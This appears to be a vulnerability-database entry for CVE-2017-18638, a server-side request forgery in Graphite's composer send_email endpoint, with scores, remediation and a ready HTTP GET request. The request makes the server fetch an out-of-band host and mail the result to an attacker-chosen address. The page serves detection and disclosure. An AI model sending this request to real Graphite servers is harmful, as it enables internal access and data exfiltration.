🔙 목록으로 돌아가기

CVE-2017-18638: Graphite <=1.1.5 - Server-Side Request Forgery

TitleGraphite <=1.1.5 - Server-Side Request Forgery
Authorhuowuzhao
SeverityHigh
ImpactAn attacker can exploit this vulnerability to access internal resources, potentially leading to unauthorized access, data leakage, or further attacks.
RemediationUpgrade to a patched version of Graphite (>=1.1.6) or apply the necessary security patches.
CVSS Score7.5
EPSS Score0.90804
CVE IDCVE-2017-18638
CWE IDCWE-918
Tags cve cve2017 graphite ssrf oast graphite_project vuln

🔍 Vulnerability Description

Graphite’s send_email in graphite-web/webapp/graphite/composer/views.py in versions up to 1.1.5 is vulnerable to server-side request forgery (SSR)F. The vulnerable SSRF endpoint can be used by an attacker to have the Graphite web server request any resource. The response to this SSRF request is encoded into an image file and then sent to an email address that can be supplied by the attacker. Thus, an attacker can exfiltrate any information.

🌐 HTTP Request

GET /composer/send_email?to=MHtI@XQVq&url=http://d5jqd3hle0o23q2u9vlgkpajkgbgbfepx.oast.online HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.2 Safari/605.1.15
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2017/CVE-2017-18638.yaml

🦈 Packet Capture: ⬇️ Download cve-2017-18638.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A